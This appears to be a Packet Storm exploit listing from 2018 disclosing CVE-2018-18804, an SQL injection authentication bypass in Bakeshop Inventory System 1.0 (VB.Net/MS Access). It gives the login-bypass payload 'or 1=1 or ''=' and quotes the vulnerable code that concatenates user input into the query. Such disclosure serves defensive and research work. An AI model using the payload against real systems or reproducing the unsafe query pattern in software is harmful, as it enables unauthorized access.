Twenty Year Anniversary

Bakeshop Inventory System In VB.Net / MS Access Database 1.0 SQL Injection

Bakeshop Inventory System In VB.Net / MS Access Database 1.0 SQL Injection
Posted Oct 29, 2018
Authored by Ihsan Sencan

Bakeshop Inventory System in VB.Net and MS Access Database version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
advisories | CVE-2018-18804
MD5 | 8b63c0e2fb10a6b566d85a54c78d9a36

Bakeshop Inventory System In VB.Net / MS Access Database 1.0 SQL Injection

Change Mirror Download
# Exploit Title: Bakeshop Inventory System in VB.Net and MS Access Database 1.0 - SQL Injection
# Dork: N/A
# Date: 2018-10-29
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/bakeshopinventory1.0.zip
# Version: 1.0
# Category: Windows
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-18804

# POC:
# 1)
# User: 'or 1=1 or ''='
# Pass: 'or 1=1 or ''='
#
# https://2.bp.blogspot.com/-xjiRUlpkNGc/W9Ywmp79JpI/AAAAAAAAENs/3UDWxFvuTfcJrEKDU9TUxJRpoT8T6yLLwCLcBGAs/s1600/sql4.png
#
#[PATH]/include/publicfunction.vb
#....
#237 Public Sub LoginUser(ByVal userid As Object, ByVal pass As Object)
#238 Try
#239 con.Open()
#240
#241 cmd = New OleDb.OleDbCommand
#242 With cmd
#243 .Connection = con
#244 .CommandText = "SELECT * FROM tblUser WHERE U_UNAME ='" & userid.Text & "' AND U_PASS = '" & pass.Text & "'"
#245 End With
#246
#247 da = New OleDb.OleDbDataAdapter
#248 da.SelectCommand = cmd
#249 dt = New DataTable
#250 da.Fill(dt)
#251
#252 If dt.Rows.Count > 0 Then
#253
#254 If dt.Rows(0).Item("U_TYPE") = "Administrator" Then
#255
#256 MsgBox("You login as administrator!!")
#257
#258 ShowForm(LoginForm1, Form1)
#259
#260
#261 LoginForm1.Hide()
#262 ElseIf dt.Rows(0).Item("U_TYPE") = "Staff" Then
#263
#264 MsgBox("You login as Staff!!")
#265
#266 With Form1
#267 '.ManageUsersToolStripMenuItem.Visible = False
#268
#269 End With
#270
#271 ShowForm(LoginForm1, Form1)
#272
#273
#274 LoginForm1.Hide()
#275 End If
#276
#277 Else
#278 MsgBox("Account does not exists.", MsgBoxStyle.Exclamation)
#279 End If
#280
#281 Catch ex As Exception
#282
#283 MsgBox(ex.Message)
#284 Finally
#285 con.Close()
#286 da.Dispose()
#287 End Try
#288 End Sub
#....


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    11 Files
  • 2
    Dec 2nd
    1 Files
  • 3
    Dec 3rd
    18 Files
  • 4
    Dec 4th
    40 Files
  • 5
    Dec 5th
    16 Files
  • 6
    Dec 6th
    50 Files
  • 7
    Dec 7th
    12 Files
  • 8
    Dec 8th
    1 Files
  • 9
    Dec 9th
    1 Files
  • 10
    Dec 10th
    15 Files
  • 11
    Dec 11th
    30 Files
  • 12
    Dec 12th
    25 Files
  • 13
    Dec 13th
    13 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close